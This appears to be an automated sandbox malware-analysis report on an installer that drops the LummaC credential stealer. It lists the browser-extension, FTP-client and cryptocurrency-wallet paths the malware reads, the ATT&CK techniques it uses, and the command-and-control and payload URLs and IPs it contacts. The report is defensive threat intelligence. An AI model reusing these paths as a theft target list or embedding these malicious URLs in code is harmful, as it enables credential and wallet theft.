Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Luther.com	Binary or memory string: WIN_81
Source: Luther.com	Binary or memory string: WIN_XP
Source: Page.9.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Luther.com	Binary or memory string: WIN_XPe
Source: Luther.com	Binary or memory string: WIN_VISTA
Source: Luther.com	Binary or memory string: WIN_7
Source: Luther.com	Binary or memory string: WIN_8

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT			Jump to behavior

Source: Yara match	File source: 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2260009291.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2259044723.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2247382365.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2288364664.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2247660690.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2246305731.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Luther.com PID: 7696, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Luther.com PID: 7696, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EB2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		13_2_00EB2263
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EB1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		13_2_00EB1C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	37 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	11 Masquerading	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
installer_1.05_37.4.exe	14%	Virustotal		Browse
installer_1.05_37.4.exe	24%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\224553\Luther.com	0%	ReversingLabs

Source	Detection	Scanner	Label
https://goldyhanders.cyou/apijinh	0%	Avira URL Cloud	safe
https://goldyhanders.cyou/=	0%	Avira URL Cloud	safe
washyceehsu.lat	0%	Avira URL Cloud	safe
https://goldyhanders.cyou/H	0%	Avira URL Cloud	safe
bloodyswif.lat	0%	Avira URL Cloud	safe
https://goldyhanders.cyou/$40.	0%	Avira URL Cloud	safe
https://goldyhanders.cyou/9	0%	Avira URL Cloud	safe
leggelatez.lat	0%	Avira URL Cloud	safe
https://cegu.shop/x	100%	Avira URL Cloud	malware
https://cegu.shop/8574262446/ph.txt#	100%	Avira URL Cloud	malware
kickykiduz.lat	0%	Avira URL Cloud	safe
savorraiykj.lat	0%	Avira URL Cloud	safe
miniatureyu.lat	0%	Avira URL Cloud	safe
https://goldyhanders.cyou/	0%	Avira URL Cloud	safe
goldyhanders.cyou	0%	Avira URL Cloud	safe
https://cegu.shop/S	100%	Avira URL Cloud	malware
https://cegu.shop/8574262446/ph.txt?	100%	Avira URL Cloud	malware
https://goldyhanders.cyou/api.0	0%	Avira URL Cloud	safe
https://goldyhanders.cyou/i	0%	Avira URL Cloud	safe
https://cegu.shop/8574262446/ph.txtebKit/537.36	100%	Avira URL Cloud	malware
https://goldyhanders.cyou/h.	0%	Avira URL Cloud	safe
https://goldyhanders.cyou/l	0%	Avira URL Cloud	safe
finickypwk.lat	0%	Avira URL Cloud	safe
https://goldyhanders.cyou/api	100%	Avira URL Cloud	malware
https://goldyhanders.cyou/S	0%	Avira URL Cloud	safe
shoefeatthe.lat	0%	Avira URL Cloud	safe
https://cegu.shop:443/8574262446/ph.txtoft	100%	Avira URL Cloud	malware
https://goldyhanders.cyou/apijpjb	0%	Avira URL Cloud	safe
https://goldyhanders.cyou:443/apiMicrosoft	0%	Avira URL Cloud	safe
https://goldyhanders.cyou:443/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cegu.shop	185.161.251.21	true	false	high
goldyhanders.cyou	104.21.16.1	true	true	unknown
jIUAzCVEKkxMKZXfO.jIUAzCVEKkxMKZXfO	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
bloodyswif.lat	true	Avira URL Cloud: safe	unknown
washyceehsu.lat	true	Avira URL Cloud: safe	unknown
leggelatez.lat	true	Avira URL Cloud: safe	unknown
kickykiduz.lat	true	Avira URL Cloud: safe	unknown
savorraiykj.lat	true	Avira URL Cloud: safe	unknown
goldyhanders.cyou	true	Avira URL Cloud: safe	unknown
miniatureyu.lat	true	Avira URL Cloud: safe	unknown
https://cegu.shop/8574262446/ph.txt	false		high
finickypwk.lat	true	Avira URL Cloud: safe	unknown
shoefeatthe.lat	true	Avira URL Cloud: safe	unknown
https://goldyhanders.cyou/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://goldyhanders.cyou/H	Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cegu.shop/	Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dfgh.online/invoker.php?compName=	Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497796930.0000000003A02000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.00000000038B0000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.00000000038BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://goldyhanders.cyou/9	Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.dr	false		high
https://goldyhanders.cyou/=	Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2260009291.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2259044723.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2288364664.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2247382365.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2247660690.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.000000000391B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop/x	Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://klipgonuh.shop/int_clp_sha.txt	Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop/8574262446/ph.txt#	Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://goldyhanders.cyou/$40.	Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://goldyhanders.cyou/apijinh	Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://goldyhanders.cyou/	Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop/8574262446/ph.txt?	Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.autoitscript.com/autoit3/X	Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmp, Luther.com.2.dr, Page.9.dr	false		high
https://goldyhanders.cyou/api.0	Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	installer_1.05_37.4.exe	false		high
https://cegu.shop/S	Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop/8574262446/ph.txtebKit/537.36	Luther.com, 0000000D.00000002.4496055520.00000000009DA000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://goldyhanders.cyou/i	Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://goldyhanders.cyou/h.	Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://goldyhanders.cyou/l	Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://goldyhanders.cyou/S	Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2288364664.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cegu.shop:443/8574262446/ph.txtoft	Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://goldyhanders.cyou/apijpjb	Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://goldyhanders.cyou:443/api	Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://goldyhanders.cyou:443/apiMicrosoft	Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.16.1	goldyhanders.cyou	United States		13335	CLOUDFLARENETUS	true
185.161.251.21	cegu.shop	United Kingdom		5089	NTLGB	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589445
Start date and time:	2025-01-12 15:28:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	installer_1.05_37.4.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@26/22@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 82 Number of non-executed functions: 294
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:28:56	API Interceptor	1x Sleep call for process: installer_1.05_37.4.exe modified
09:29:00	API Interceptor	10x Sleep call for process: Luther.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.16.1	8L6MBxaJ2m.exe	Get hash	malicious	FormBook	Browse	www.rafconstrutora.online/0xli/
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.kkpmoneysocial.top/86am/
	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
185.161.251.21	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
